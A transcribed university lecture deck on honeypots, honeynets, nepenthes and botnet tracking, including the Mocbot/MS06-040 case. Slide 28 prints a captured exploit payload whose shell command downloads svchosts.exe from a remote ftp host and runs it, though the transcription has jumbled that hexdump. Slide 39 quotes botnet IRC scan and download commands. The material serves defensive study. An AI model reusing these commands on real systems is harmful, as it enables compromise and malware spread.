Honeypots UNIVERSITÄT MANNHEIM. A quick overview. Pi1 - Laboratory for Dependable Distributed Systems

Transcription

1 Honeypots A quick overview Pi1 - Laboratory for Dependable Distributed Systems

2 Outline Motivation High-interaction vs. low-interaction honeypots Gen III honeynets honeyd nepenthes Examples

3 Intro We see more and more abuses of communication systems (but only the outcome!) Spam & Phishing Bots & Botnets Cracker exploiting vulnerabilities... How can we learn more about this threat? Know Your Enemy

4 Basic Problem How can we defend against an enemy, when we don t even know who the enemy is?

5 Honeypot History The Cuckoo s Egg (Clifford Stoll) DTK (Fred Cohen) Honeyd (Niels Provos) Honeynet A honeypot Project Code is an information Mantrap system (jails - ressource Symantec) whose value lies in unauthorized or illicit use Specter (Netsec - specter.com) of that ressource. KFSensor (Keyfocus.net) Network Telescopes / Sinkholes Large setups at AV Companies

6 High- vs. Lowinteraction The fundamental difference

7 Different Approaches High-interaction Low-interaction Real services, OS s, or applications Emulation of TCP/IP stack, vulnerabilities,... Higher risk Lower risk Hard to deploy / maintain Easy to deploy / maintain Capture extensive amount of information Example: Gen III honeynets Capture quantitative information about attacks Examples: honeyd, nepenthes, labrea,...

8 Honeynets Network of high-interaction honeypot designed to capture in-depth information. Information has different value to different organizations. It is an architecture you populate with live systems, not a product or software. Any traffic entering or leaving is suspect.

9 GenIII Architecture Setup at German Honeynet Project

10 Concept Honeynet is highly controlled network Every packet that enters or leaves the network is by definition suspicious Three basic blocks Data Analysis Data Control Data Capture } Honeywall

11 Honeywall Transparent bridge Easiest way to deploy Honeywall Linux 2.6 or 2.4 with ebtables-patch Hardened system Three interfaces for routing & management GenIII honeynets: Roo Honeywall CDROM (more on that later)

12 Data Control What happens after a compromise? Possibly malicious! Legal issues?

13 Data Control Data Control enables mechanism to control incoming and outgoing traffic Mitigate risk! Usage of IPS snort_inline

14 Data Control Snort_inline ( Modification of IDS Snort New rules drop, replace & reject Example rules used for botnet tracking alert tcp $HOME any <> $EXTERNAL any (msg:"irc topic"; flow:established; content:"topic"; nocase; replace:"t0pic";) drop tcp $HOME any <> $EXTERNAL 445 (msg:"bot-scan"; flow:established;)

15 Data Control In addition to exploits, DDoS attacks also pose a threat Connection-limiting via iptables Enable some outgoing connections so that attacker can get tool and connect to IRC ### Set the connection outbound limits for different protocols. SCALE="day" TCPRATE="15" UDPRATE="20" ICMPRATE="50" OTHERRATE="15" # IPsec, IPv6 tunnel, and # other non-ip proto 1, 6, 17

16 Data Capture How do you observe an intruder without him noticing? How can you observe encrypted sessions? tcpdump/tethereal is worthless How can you observe the keystrokes? How can you observe the execution flow of a program?

17 Data Capture: Sebek Simple script can t log activity of programs Use rootkit-based techniques to observe the intruder! Sebek Hidden kernel module that captures (almost) all activity Dumps activity to the network Attacker can t sniff any traffic since TCP/IP stack of all honeypots is modified

18 Data Capture: Sebek Figure 2

19 Data Capture: Sebek Thorsten Holz Figure Reaktive 3 Sicherheit - Honeynets - Universität Dortmund

20 Data Analysis Most work has to be done in the area of Data Analysis Lots of manual analysis tethereal, p0f, tcpflow, custom scripts,... Analysis of IRC logs Analysis of obtained tools Profiling of attackers?...

21 Roo Honeywall Based on Fedora Core 3 Automated, headless installation Web-based interface ( Walleye ) for administration and Data Analysis Balas, Viecco: Towards a Third Generation Data Capture Architecture for Honeynets, IEEE Information Assurance Workshop, 2005

22 Low-interaction No real systems, just emulation honeyd ( Emulation of TCP/IP stacks Fool fingerprinting tools like nmap Scripts can simulate service nepenthes ( Emulate vulnerable parts of services Collect autonomous spreading malware

23 nepenthes Tool to automatically collect malware like bots and other autonomous spreading malware Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities Available at

24 Architecture Modular architecture Vulnerability modules Shellcode handler Download modules Submission modules Trigger events Shell-emulation and virtual filesystem

25 Schematic overview

26 Vulnerability modules Emulate vulnerable services Play with exploits until they send us their payload (finite state machine) Currently more than 20 available vulnerability modules More in development Analysis of known vulnerabilities & exploits necessary Automation possible?

27 Shellcode modules Automatically extract URL used by malware to transfer itself to compromised machine sch_generic_xor Generic XOR decoder sch_generic_createprocess sch_generic_url sch_generic_cmd

28 [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x cmd 41 /c AAAAAAAA AAAAAAAA [ dia ] 0x echo open 0c a >> ii..#..w.. &...B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x echo 3c 8b 7c user a ef a 8b 4f 18 8b 5f 20 >> 01 eb ii E<..x.. &.O.._.. [ dia ] 0x0490 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c0 >> ii..i.4... & 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 8b >> 01 eb ii..f..k._ &... [ dia ] 0x04c0 89 echo 5c bye c3 31 c0 64 8b c0 78 >> 0f 8b ii.\$..1.d &.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ftp ef -n ce e0 -v 60 -s:ii fe & 8a 0e 57 ff e7 e8 ee ff h...`h....w... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op del ii & [ dia ] 0x e e e e en [ dia ] 0x svchosts.exe e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x0550 ftp://a:a@ /svchosts.exe f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB

29 Statistics: nepenthes Four months nepenthes on /18 network: 50,000,000+ files downloaded 14,000+ unique binaries based on md5sum ~1,000 different botnets Anti-virus engines detect between 70% and 90% of the binaries Korgobot/Padobot dominates

30 Examples What have we learned?

31 Phishing Phishing incidents in UK and Germany Compromise Phishing website Phishing s or: redirection of traffic Learned more about typical proceeding of attackers

32 Botnets Botnet: network of compromised machines that can be remotely controlled by an attacker Mainly used for DDoS, spam, identity theft,... Capture bot samples with the help of honeypots Observing botnets for mitigation Attacker Bot C&C Server $advscan dcom b Bot IRC hax0r.example.com 3267/TCP Bot

33 Conclusion Honeypots allow us to learn more about attacks Lure in attackers and study them in a fish-bowl environment Easy to setup, maintenance is harder We can for example learn more about phishing Proceeding by attackers Other use cases for honeypots include credit card fraud, collecting malware, botnet tracking, web-based attacks, client-side attacks,...

34 Thorsten Holz More information: Pi1 - Laboratory for Dependable Distributed Systems

35 CWSandbox

36 Example Mocbot & MS06-040

37 Introduction MS Security Bulletin MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (August 8, 2006) PoC exploit released a couple of days later Botnets quickly adopt new infection vector Now: tracking of one botnet that uses this vulnerability gzn.lx.irc-xxx.org:45130 Main channel: ##Xport## Nick: RBOT DEU XP-SP

38 ##Xport## 00:06 < RBOT JPN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :06 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT USA 2K-90511> [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT ITA 2K-89428> [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT PRT XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT F USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT JPN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT FRA 2K-22302> [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT GBR XP-SP > [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT USA 2K-54815> [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT ITA 2K-39418> [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT F ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :09 < RBOT BRA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :09 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :09 < RBOT DEU XP-SP > [Main]: This is the first time that Rbot v2 is running on: :10 < RBOT ESP 2K-80303> [Main]: This is the first time that Rbot v2 is running on: :10 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT CHN 2K-65840> [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT F ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT VEN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT FRA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :12 < RBOT JPN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT DEU XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT ITA 2K-77534> [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT DNK XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :15 < RBOT JPN 2K-94205> [Main]: This is the first time that Rbot v2 is running on: :15 < RBOT BRA XP-SP > [Main]: This is the first time that Rbot v2 is running on:

39 Channels ##Xport##:.ircraw join ##scan##,##dr##, ##frame##,##o## ##scan##:.scan netapi r -b -s $$ ##DR##:.download webmasterexe/drsmartload152a.exe c:\dr.exe 1 -s $$ ##frame##:.download loadadv518.exe c:\frm.exe 1 -s * ##o##:.download nads.exe c:\nds.exe 1 -s

40 DollarRevenue

41 Economics of Botnets $ grep US log wc -l 998 $ grep CAN log wc -l 20 $ grep GBR log wc -l 103 $ grep CHN log wc -l 756 $ egrep -v "US CAN GBR CHN log wc -l * * * * * 0.02 = $